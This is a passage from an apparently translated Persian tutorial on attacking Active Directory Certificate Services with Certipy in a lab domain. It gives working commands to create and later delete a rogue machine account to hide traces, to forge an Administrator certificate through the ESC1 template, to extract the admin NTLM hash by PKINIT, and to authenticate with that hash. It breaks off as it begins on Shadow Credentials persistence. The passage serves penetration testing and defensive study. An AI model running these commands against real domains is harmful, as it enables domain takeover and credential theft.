              \u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634\u060c \u062a\u0648\u0636\u06cc\u062d \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u06a9\u0647 \u067e\u0633 \u0627\u0632 \u062a\u0627\u06cc\u06cc\u062f \u0645\u062c\u0648\u0632\u0647\u0627 \u0648 \u0627\u0641\u0632\u0627\u06cc\u0634 \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u062d\u0633\u0627\u0628\u200c\u0647\u0627 \u0631\u0627 \u0628\u0647 \u0631\u0648\u0632 \u06a9\u0631\u062f\u0647 \u0648 \u0627\u0632 \u0627\u06cc\u0646 \u0637\u0631\u06cc\u0642 \u0628\u0647 \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u062f\u06cc\u06af\u0631 \u062f\u0633\u062a\u0631\u0633\u06cc \u067e\u06cc\u062f\u0627 \u06a9\u0646\u06cc\u0645 \u06cc\u0627 \u06a9\u0646\u062a\u0631\u0644 \u0622\u0646\u200c\u0647\u0627 \u0631\u0627 \u0628\u0647\u200c\u062f\u0633\u062a \u0622\u0648\u0631\u06cc\u0645. \u0627\u06cc\u0646 \u0627\u0645\u0631 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u062d\u0645\u0644\u0627\u062a \u067e\u06cc\u0648\u0633\u062a\u0647 \u0648 \u062d\u0631\u06a9\u062a \u062f\u0631 \u0633\u0637\u062d \u062f\u0627\u0645\u0646\u0647 (lateral movement) \u0645\u0646\u062c\u0631 \u0634\u0648\u062f.<\/span><\/p>\n
              \"\"<\/span><\/p>\n
              \u0627\u06cc\u062c\u0627\u062f \u062d\u0633\u0627\u0628\u200c\u0647\u0627<\/strong> (<\/strong>\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u0645\u0627\u0634\u06cc\u0646 \u0628\u0631\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632<\/strong> ESC8)<\/strong><\/span><\/p>\n
              \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0628\u0647 raj \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u06cc\u06a9 \u062d\u0633\u0627\u0628 \u0645\u0627\u0634\u06cc\u0646 \u062c\u062f\u06cc\u062f \u0628\u0647 \u0646\u0627\u0645 BADPC \u0628\u0627 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 Password@2 \u062f\u0631 Domain Controller \u0628\u0627 \u0622\u062f\u0631\u0633 \u06f1\u06f9\u06f2\u066b\u06f1\u06f6\u06f8\u066b\u06f1\u066b\u06f2\u06f0 \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u062f. \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u0645\u0627\u0634\u06cc\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0627\u062a NTLM relay (ESC8) \u06cc\u0627 \u0628\u0631\u0627\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u0648\u0646\u062f\u060c \u06a9\u0647 \u0628\u0647 \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a \u062f\u0633\u062a\u0631\u0633\u06cc \u0648 \u062d\u0641\u0638 \u062f\u0633\u062a\u0631\u0633\u06cc \u06a9\u0645\u06a9 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n
              certipy-ad account -u raj -p Password@1 -dc-ip 192.168.1.20 -target 192.168.1.20 -user BADPC -pass Password@2 create<\/span><\/pre>\n
              \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u0645\u0627\u0634\u06cc\u0646\u060c \u06a9\u0647 \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u0645\u062c\u0627\u0632 \u0628\u0647 \u062b\u0628\u062a\u200c\u0646\u0627\u0645 \u062f\u0631 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0645\u0627\u0634\u06cc\u0646 \u062f\u0627\u0645\u0646\u0647 \u0647\u0633\u062a\u0646\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u062a\u0648\u0633\u0637 \u0645\u0627 \u0628\u0631\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 ESC8 \u062c\u0647\u062a \u062d\u0645\u0644\u0627\u062a NTLM relay\u060c \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u0645\u0627\u0634\u06cc\u0646\u060c \u06cc\u0627 \u062d\u0631\u06a9\u062a \u0628\u0647 \u0633\u0645\u062a DCSync \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc Domain Controller \u0645\u0648\u0631\u062f \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u06af\u06cc\u0631\u0646\u062f.<\/span><\/p>\n
              \u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634 \u062a\u0648\u0636\u06cc\u062d \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u06a9\u0647 \u0627\u06cc\u062c\u0627\u062f \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u0645\u0627\u0634\u06cc\u0646\u060c \u06a9\u0647 \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u0628\u0631\u0627\u06cc \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0645\u0627\u0634\u06cc\u0646 \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 \u0645\u062c\u0627\u0632 \u0647\u0633\u062a\u0646\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u062d\u0645\u0644\u0627\u062a \u067e\u06cc\u0686\u06cc\u062f\u0647\u200c\u0627\u06cc \u0645\u0627\u0646\u0646\u062f NTLM relay \u0648 DCSync \u0645\u0646\u062c\u0631 \u0634\u0648\u062f \u06a9\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc\u200c\u0647\u0627\u06cc \u0628\u06cc\u0634\u062a\u0631\u06cc \u0631\u0627 \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0622\u0648\u0631\u062f \u0648 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u0628\u0647 \u0635\u0648\u0631\u062a \u067e\u0627\u06cc\u062f\u0627\u0631 \u0628\u0647 \u0633\u06cc\u0633\u062a\u0645 \u0648\u0627\u0631\u062f \u0634\u0648\u062f.<\/span><\/p>\n
              \"\"<\/span><\/p>\n
              \u062d\u0630\u0641 \u062d\u0633\u0627\u0628\u200c\u0647\u0627<\/strong><\/span><\/p>\n
              \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u062d\u0633\u0627\u0628 \u0645\u0627\u0634\u06cc\u0646 BADPC \u0631\u0627 \u067e\u0633 \u0627\u0632 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u062d\u0630\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n
              certipy-ad account -u Administrator -p Password@1 -dc-ip 192.168.1.20 -target 192.168.1.20 -user BADPC delete<\/span><\/pre>\n
              \u0627\u06cc\u0646 \u0639\u0645\u0644 \u0628\u0631\u0627\u06cc \u067e\u0648\u0634\u0627\u0646\u062f\u0646 \u0631\u062f\u067e\u0627\u0647\u0627 \u067e\u0633 \u0627\u0632 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062d\u0633\u0627\u0628 \u0628\u0631\u0627\u06cc \u0627\u0646\u062a\u0642\u0627\u0644 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a NTLM (ESC8)\u060c \u067e\u0646\u0647\u0627\u0646\u200c\u0633\u0627\u0632\u06cc \u06cc\u06a9 \u0645\u0627\u0634\u06cc\u0646 \u06cc\u0627 \u062f\u0631\u06cc\u0627\u0641\u062a \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u062b\u0628\u062a\u200c\u0646\u0627\u0645 \u062e\u0648\u062f\u06a9\u0627\u0631 \u0645\u0641\u06cc\u062f \u0627\u0633\u062a.<\/span><\/p>\n
              \u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634\u060c \u062a\u0648\u0636\u06cc\u062d \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u06a9\u0647 \u062d\u0630\u0641 \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u0645\u0627\u0634\u06cc\u0646 \u067e\u0633 \u0627\u0632 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9 \u062a\u06a9\u0646\u06cc\u06a9 \u0628\u0631\u0627\u06cc \u067e\u0648\u0634\u0627\u0646\u062f\u0646 \u0631\u062f\u067e\u0627\u0647\u0627 \u0648 \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u062d\u0645\u0644\u0627\u062a \u06cc\u0627 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u0647\u0627 \u0645\u0627\u0646\u0646\u062f \u062d\u0645\u0644\u0627\u062a NTLM relay \u0648 \u062f\u0631\u06cc\u0627\u0641\u062a \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0628\u0647 \u06a9\u0627\u0631 \u0631\u0648\u062f.<\/span><\/p>\n
              \"\"<\/span><\/p>\n
              \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627<\/strong><\/span><\/p>\n
              \u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0627\u0632 \u0627\u0644\u06af\u0648\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u06a9\u0647 \u0642\u0628\u0644\u0627\u064b \u062f\u0631 \u0641\u0627\u0632 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u06a9\u0634\u0641 \u06a9\u0631\u062f\u06cc\u0645 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645. \u062f\u0631 \u0627\u06cc\u0646\u062c\u0627\u060c \u06cc\u06a9 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0628\u0647 \u0646\u0627\u0645 Domain Administrator \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645 \u0648 \u0634\u0646\u0627\u0633\u0647\u200c\u0647\u0627\u06cc UPN \u0648 SID \u0627\u0648 \u0631\u0627 \u062f\u0631 \u0622\u0646 \u062c\u0627\u0633\u0627\u0632\u06cc \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645. CA (Certificate Authority)\u060c \u0628\u0647 \u062f\u0644\u06cc\u0644 \u06a9\u0646\u062a\u0631\u0644\u200c\u0647\u0627\u06cc \u0636\u0639\u06cc\u0641 \u062f\u0631 \u0627\u0644\u06af\u0648\u060c \u0627\u06cc\u0646 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0631\u0627 \u0628\u062f\u0648\u0646 \u0631\u0627\u0633\u062a\u06cc\u200c\u0622\u0632\u0645\u0627\u06cc\u06cc \u0645\u0646\u0627\u0633\u0628 \u0627\u0645\u0636\u0627 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n
              certipy-ad req -u raj -p Password@1 -dc-ip 192.168.1.20 -target 192.168.1.20 -ca ignite-DC01-CA -template ESC1 -upn 'administrator@ignite.local' -sid 'S-1-5-21-2876727035-1185539019-1507907093-500'<\/span><\/pre>\n
              \u0627\u06af\u0631 \u0639\u0645\u0644\u06cc\u0627\u062a \u0645\u0648\u0641\u0642\u06cc\u062a\u200c\u0622\u0645\u06cc\u0632 \u0628\u0627\u0634\u062f\u060c \u0627\u06a9\u0646\u0648\u0646 \u06cc\u06a9 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0645\u0639\u062a\u0628\u0631 \u062f\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631 \u062f\u0627\u0631\u06cc\u0645 \u06a9\u0647 \u0647\u0648\u06cc\u062a \u06cc\u06a9 \u062d\u0633\u0627\u0628 \u067e\u0631\u0627\u0645\u062a\u06cc\u0627\u0632 \u0631\u0627 \u062c\u0639\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n
              \u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634\u060c \u062a\u0648\u0636\u06cc\u062d \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u06a9\u0647 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06cc\u06a9 \u0627\u0644\u06af\u0648\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 (\u0645\u062b\u0644\u0627\u064b ESC1)\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0627\u06cc \u0628\u0631\u0627\u06cc \u06cc\u06a9 \u062d\u0633\u0627\u0628 \u067e\u0631\u0627\u0645\u062a\u06cc\u0627\u0632 \u0645\u0627\u0646\u0646\u062f administrator \u0635\u0627\u062f\u0631 \u06a9\u0631\u062f\u060c \u0628\u062f\u0648\u0646 \u0622\u0646\u200c\u06a9\u0647 \u06a9\u0646\u062a\u0631\u0644\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0627\u0632 \u062c\u0645\u0644\u0647 \u0628\u0631\u0631\u0633\u06cc \u0645\u0627\u0644\u06a9\u06cc\u062a UPN \u06cc\u0627 SID \u0627\u0639\u0645\u0627\u0644 \u0634\u0648\u062f. \u0646\u062a\u06cc\u062c\u0647 \u0627\u06cc\u0646 \u0641\u0631\u0622\u06cc\u0646\u062f\u060c \u0628\u062f\u0633\u062a \u0622\u0648\u0631\u062f\u0646 \u06cc\u06a9 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u062c\u0639\u0644\u06cc \u0627\u0645\u0627 \u0645\u0639\u062a\u0628\u0631 \u0628\u0631\u0627\u06cc \u0627\u0646\u062c\u0627\u0645 \u062d\u0645\u0644\u0627\u062a \u0628\u0639\u062f\u06cc \u0627\u0633\u062a.<\/span><\/p>\n
              \"\"<\/span><\/p>\n
              \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0627\u0632 \u0637\u0631\u06cc\u0642 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647<\/strong><\/span><\/p>\n
              \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0641\u0627\u06cc\u0644 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 .pfx \u06a9\u0647 \u0647\u0648\u06cc\u062a Domain Administrator \u0631\u0627 \u062c\u0639\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u0627\u0632 PKINIT \u062f\u0631 \u067e\u0631\u0648\u062a\u06a9\u0644 Kerberos \u0628\u0631\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645. \u0627\u06cc\u0646 \u0631\u0648\u0634 \u0628\u0647\u200c\u0637\u0648\u0631 \u06a9\u0627\u0645\u0644 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0627\u062f\u0645\u06cc\u0646 \u0631\u0627 \u062f\u0648\u0631 \u0645\u06cc\u200c\u0632\u0646\u062f. \u0627\u0632 \u0622\u0646\u062c\u0627 \u06a9\u0647 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u062a\u0648\u0633\u0637 \u06cc\u06a9 CA \u0645\u0648\u0631\u062f \u0627\u0639\u062a\u0645\u0627\u062f \u0627\u0645\u0636\u0627 \u0634\u062f\u0647 \u0648 \u0634\u0627\u0645\u0644 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0647\u0648\u06cc\u062a\u06cc \u0645\u062f\u06cc\u0631 \u0627\u0633\u062a\u060c Domain Controller \u0622\u0646 \u0631\u0627 \u0645\u0639\u062a\u0628\u0631 \u062a\u0644\u0642\u06cc \u06a9\u0631\u062f\u0647 \u0648 \u062f\u0633\u062a\u0631\u0633\u06cc \u06a9\u0627\u0645\u0644 \u0645\u062f\u06cc\u0631\u06cc\u062a\u06cc \u0627\u0639\u0637\u0627 \u0645\u06cc\u200c\u06a9\u0646\u062f\u2014\u06a9\u0647 \u0646\u0642\u0637\u0647\u200c\u06cc \u06a9\u0644\u06cc\u062f\u06cc \u062f\u0631 \u0627\u0641\u0632\u0627\u06cc\u0634 \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0633 \u0645\u062d\u0633\u0648\u0628 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n
              certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.1.20<\/span><\/pre>\n
              \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0647\u0634 NTLM \u0631\u0627 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 \u0622\u0646 \u0628\u0631\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u0628\u06cc\u0634\u062a\u0631 \u062f\u0631 \u0645\u062d\u06cc\u0637 \u062f\u0627\u0645\u0646\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f.<\/span><\/p>\n
              \u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634\u060c \u0628\u0647 \u06cc\u06a9\u06cc \u0627\u0632 \u0645\u0647\u0645\u200c\u062a\u0631\u06cc\u0646 \u0645\u0631\u0627\u062d\u0644 \u062d\u0645\u0644\u0647 \u0627\u0634\u0627\u0631\u0647 \u0634\u062f\u0647: \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06af\u0648\u0627\u0647\u06cc \u062c\u0639\u0644\u06cc \u0627\u0645\u0627 \u0645\u0639\u062a\u0628\u0631 \u0628\u0631\u0627\u06cc \u0648\u0631\u0648\u062f \u0628\u0647 \u062f\u0627\u0645\u0646\u0647 \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631. \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 PKINIT \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u0634\u0648\u062f \u0648 \u0646\u062a\u06cc\u062c\u0647 \u0622\u0646 \u062f\u0631\u06cc\u0627\u0641\u062a \u0647\u0634 NTLM \u0648 \u06a9\u0633\u0628 \u062f\u0633\u062a\u0631\u0633\u06cc \u06a9\u0627\u0645\u0644 \u0628\u0647 \u0645\u0646\u0627\u0628\u0639 \u062f\u0627\u0645\u0646\u0647 \u0627\u0633\u062a.<\/span><\/p>\n
              \"\"<\/span><\/p>\n
              \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632<\/strong> NTLM Hash <\/strong>\u0648 \u0628\u0631\u0631\u0633\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc\u200c\u0647\u0627<\/strong><\/span><\/p>\n
              \u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u06cc \u0645\u0627\u060c \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645 \u062a\u0627 \u0646\u0634\u0627\u0646 \u062f\u0647\u06cc\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06cc\u06a9 \u0647\u0634 NTLM \u0634\u0646\u0627\u062e\u062a\u0647\u200c\u0634\u062f\u0647 (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c \u062d\u0633\u0627\u0628 raj) \u0628\u0647 Active Directory \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u06a9\u0631\u062f\u0647 \u0648 \u0645\u062c\u0648\u0632\u0647\u0627 \u0648 \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0628 Administrator \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u06a9\u0631\u062f. \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u0634\u062e\u0635 \u06a9\u0646\u062f \u06a9\u0647 \u0622\u06cc\u0627 \u062d\u0633\u0627\u0628 raj \u0642\u0627\u062f\u0631 \u0628\u0647 \u062a\u063a\u06cc\u06cc\u0631 \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0628\u060c \u062a\u0632\u0631\u06cc\u0642 \u0627\u0639\u062a\u0628\u0627\u0631 \u067e\u0646\u0647\u0627\u0646 (Shadow Credentials) (\u0645\u0637\u0627\u0628\u0642 \u0628\u0627 \u062d\u0645\u0644\u0647 ESC10) \u06cc\u0627 \u0628\u0627\u0632\u0646\u0634\u0627\u0646\u06cc \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9 \u0632\u0645\u0627\u0646\u06cc \u0628\u0633\u06cc\u0627\u0631 \u06a9\u0644\u06cc\u062f\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0647\u0634 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u062f\u0631 \u062f\u0633\u062a\u0631\u0633 \u0628\u0627\u0634\u062f \u0648\u0644\u06cc \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0645\u062a\u0646 \u0633\u0627\u062f\u0647 (cleartext) \u0645\u0648\u062c\u0648\u062f \u0646\u0628\u0627\u0634\u062f.<\/span><\/p>\n
              certipy-ad account -u raj -hashes 64fbae31cc352fc26af97cbdef151e03 -dc-ip 192.168.1.20 -user 'administrator' read<\/span><\/pre>\n
              \u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634\u060c \u062a\u0623\u06a9\u06cc\u062f \u0634\u062f\u0647 \u06a9\u0647 \u062f\u0631 \u0634\u0631\u0627\u06cc\u0637\u06cc \u06a9\u0647 \u0645\u0647\u0627\u062c\u0645 \u0628\u0647 \u0647\u0634 NTLM \u062f\u0633\u062a\u0631\u0633\u06cc \u062f\u0627\u0631\u062f \u0627\u0645\u0627 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0631\u0627 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0648\u0627\u0636\u062d \u0646\u0645\u06cc\u200c\u062f\u0627\u0646\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0647\u0645\u0686\u0646\u0627\u0646 \u0627\u0632 Certipy \u0628\u0631\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0648 \u0627\u0646\u062c\u0627\u0645 \u0628\u0631\u0631\u0633\u06cc\u200c\u0647\u0627\u06cc \u062d\u06cc\u0627\u062a\u06cc \u0631\u0648\u06cc \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u067e\u0631\u0627\u0645\u062a\u06cc\u0627\u0632 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u062f. \u0627\u06cc\u0646 \u0631\u0648\u0634 \u0628\u0647\u200c\u0637\u0648\u0631 \u062e\u0627\u0635 \u062f\u0631 \u062d\u0645\u0644\u0627\u062a\u06cc \u0645\u062b\u0644 ESC10 \u06a9\u0627\u0631\u0628\u0631\u062f \u062f\u0627\u0631\u062f \u0648 \u0631\u0627\u0647\u06cc \u0645\u0624\u062b\u0631 \u0628\u0631\u0627\u06cc \u062c\u0645\u0639\u200c\u0622\u0648\u0631\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0648 \u0628\u0631\u0631\u0633\u06cc \u067e\u062a\u0627\u0646\u0633\u06cc\u0644 \u0627\u0641\u0632\u0627\u06cc\u0634 \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 \u0627\u0633\u062a.<\/span><\/p>\n
              \"\"<\/span><\/p>\n
              \u0645\u062f\u06cc\u0631\u06cc\u062a<\/strong> Shadow Credentials (<\/strong>\u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u067e\u0646\u0647\u0627\u0646<\/strong>)<\/strong><\/span><\/p>\n
              \u067e\u0633 \u0627\u0632 \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0628\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc\u200c\u0647\u0627\u06cc \u0628\u0627\u0644\u0627 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627 (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c ESC1)\u060c \u062a\u0645\u0631\u06a9\u0632 \u0645\u0627 \u0627\u0632 \u0627\u0641\u0632\u0627\u06cc\u0634 \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc (Privilege Escalation) \u0628\u0647 \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc (Persistence) \u062a\u063a\u06cc\u06cc\u0631 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span>
              \nShadow Credentials \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0628\u0647 \u0645\u0627 \u0645\u06cc\u200c\u062f\u0647\u0646\u062f \u06a9\u0647 \u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u0648\u0631\u0648\u062f \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 \u0631\u0627 \u0628\u062f\u0648\u0646 \u062a\u063a\u06cc\u06cc\u0631 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u06a9\u0627\u0631\u0628\u0631 \u0648 \u0628\u062f\u0648\u0646 \u0627\u06cc\u062c\u0627\u062f \u0647\u0634\u062f\u0627\u0631 \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0633\u0646\u062a\u06cc\u060c \u0628\u0647 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631\u06cc \u062f\u06cc\u06af\u0631\u06cc \u062a\u0632\u0631\u06cc\u0642 \u06a9\u0646\u06cc\u0645.<\/span><\/p>\n
